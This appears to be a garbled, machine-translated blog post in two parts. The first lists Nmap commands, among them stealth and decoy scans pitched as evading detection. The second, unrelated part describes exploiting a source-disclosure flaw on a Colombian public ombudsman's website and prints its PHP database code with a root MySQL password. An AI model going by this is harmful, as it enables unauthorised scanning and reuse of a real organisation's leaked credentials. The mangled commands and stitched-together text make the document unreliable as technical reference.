interesting ways to use Nmap 
Get information from a host remote sensing of SO
- nmap-sS-P0-sV-O-sS \u0026lt;address>
TCP SYN scan =
(or stealth scan) -P0 = not send ICMP pings
-sV = detected
versions -O = attempts to identify the operating system
Other options:
-A = enable OS fingerprinting and version detection
-v = used twice-v for more details
List servers with a specific port open - nmap-sT-p 80-oG - 192.168.1 .* detect active IP's on a network
nmap-sP 192.168.0 .* nmap-sP 192.168.0.0/24 -
Ping a range of IP's
192.168.1.100-254 nmap-sP - Find
unused IP addresses in a subnet
nmap-T4-sP 192.168.2.0/24 & & egrep "00:00:00:00:00:00" / proc / net / arp -
Virus Scan forconficker
nmap-PN-T4-P139, 445-n-v-script = smb-check-vulns-script-args = 1 192.168.0.1-254 safe - Scan network for AP
false
nmap-A-p1-85 ,113,443,8080-8100-T4-50-hostgroup min-max-rtt-timeout 2000-initial-rtt-timeout 300-max-retries 3-host-timeout-max-scan 20m 1000-oA-delay wapscan 10.0.0.0 / 8 -
Create a lure for port scanning to avoid detection
nmap-sS 192.168.0.2 192.168.0.10-D scans node ports 192,168 - .1.10 spoofea while the IP 192.168.0.2
asattacker node (the IP must be active) will seem so
the scan is run from the IP 192.168.0.2 (the ip spoofed) . Check the logs in / var / log / secure to check if it has to operate normally. List reverse DNS records from one subnet
nmap-sL-R 209.85.229.99/27 - many nodes with few Linux and Windows is on a network
nmap-F-O 192.168.0.1-255 Disclosure
(FSD) , so I decided to look at some sites and the first surprise was the ombudsman the public of Colombia re
"My country of origin, and so great was my surprise to run my first request, PLOP, you download a file and look for on the original code was, after a few minutes I could find the exact path where the connection to the database, - -what really interested us Here I leave:
\u0026lt;?
/ / List of functions for connecting different databases # Connect to communications function
{$ link = @ mysql_connect ("localhost", "root", "oburgos"); ($ link) if ($ link & & mysql_select_db ("Communicated")) return ; return (FALSE);}
# Conecta a noticias $ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & ; & mysql_select_db ("Noticias")) return ($ Link); return (FALSE);}# Connect to reports
db_connectinf function () {$ link = @ mysql_pconnect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("reports")) return ($ link); return (FALSE);} # Connect to resolutions db_resconnect function () { $ link = @ mysql_pconnect (" ; localhost "," root "," oburgos "); if ($ link & & mysql_select_db ("resolución")) return ($ link); return (FALSE);}
/ / Foros
db_foros function () {
$ link = mysql_connect @ (" ; localhost "," root "," oburgos ");
if ($ link & & mysql_select_db (" link Foro "))
return ($);
return (FALSE);}
/ / encuesta encuestas
function () {
$ link = @ mysql_connect ("localhost", "Root", "oburgos");
link if ($ link & & mysql_select_db ("encuestas"))
return ($);
return (FALSE);}
/ / OJC OJC
function ()
{$ link = @ mysql_connect ("localhost", "root", "oburgos"); ($ link)
if ($ link & & mysql_select_db ("OJC")) return
;
return (FALSE);}
/ / código de procedimiento
function cpp ()
{$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("cpp"))
return ($ link );
return (FALSE);}
/ / historia - DP
hdp function () {
$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("def_publica"))
return ($ link);
return (FALSE);}
/ / System sn_def News
function () {
$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & ; & mysql_select_db ("noticias2007"))
return ($ link);
return (FALSE);}
?>
But unfortunately the MySQL server is local and can not connect remotely to it.
Greetings!
0 comments:
Post a Comment